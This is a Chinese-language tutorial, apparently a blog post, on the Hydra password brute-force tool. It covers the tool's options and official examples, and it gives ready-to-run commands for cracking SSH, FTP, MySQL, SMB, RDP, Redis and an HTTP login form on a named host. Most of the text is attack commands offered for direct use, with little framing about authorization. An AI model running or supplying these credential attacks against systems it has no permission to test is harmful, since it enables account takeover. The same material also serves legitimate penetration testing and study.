目录
工具介绍
参数说明
官方示例
官方字典
ssh爆破
ftp爆破
mysql爆破
smb爆破
rdb爆破
http爆破
redis爆破
工具介绍
hydra 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
参数说明
-l : 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口,例如:http服务使用非80端口
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-t 同时运行的线程数,默认为16
-C 使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-w 设置最大超时的时间,单位秒,默认是30s
-v / -V 显示详细过程
server 目标ip,代表要攻击的目标(单个),多个目标时请使用 -M 参数
-M 指定多个攻击目标,存储攻击目标的文件的路径(建议为绝对路径)。存储格式必须为 "地址:端口"
service 指定服务名,支持的服务和协议官方示例
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
官方字典
该目录的字典文件含义如下
big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录,默认用户名等
stress #压力测试
vulns #漏洞测试
ssh爆破
hydra -L user.txt -P /home/kali/top100password.txt -t 1 -vV -e ns 192.168.10.136 ssh -o ssh.txt- 说明
-L 指定用户字典文件
-P 指定密码字典文件
-o 把成功的输出到ssh.txt文件
-vV 显示详细信息
-s 指定其他端口 如果要修改默认22端口,可以使用 -s 参数
这里加-f则爆破出第一个用户的密码后就停止,不会对后续的用户进行爆破,如果需要将文件的每个用户都爆破则不加-f
hydra -l root -P /home/kali/top100password.txt -t 1 -vV -e ns 192.168.10.136 ssh -o ssh.txt -f
ftp爆破
nmap -p 21 192.168.10.134hydra -l c5moon -P /home/kali/top100password.txt 192.168.10.134 ftp -vV -f
mysql爆破
hydra 10.133.13.207 mysql -l root -P /home/kali/top100password.txt -e ns -vV -f
smb爆破
hydra 10.133.13.207 smb -l administrator -P /home/kali/top100password.txt -e ns -vV -f -o smb.txthydra -M ip.txt smb -l administrator -P /home/kali/top100password.txt -e ns -vV -f -o smb.txt
rdb爆破
hydra 10.133.13.207 rdp -l administrator -P /home/kali/top100password.txt -e ns -vV -f -o rdp.txt
mstschttp爆破
hydra -l admin -P /home/kali/top100password.txt -vV -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&ps=^PASS^&action=login:login-error"
redis爆破
这里redis只有密码,不需要账号
hydra 10.133.38.203 redis -P /home/kali/top100password.txt -e ns -vV -f -o redis.txt
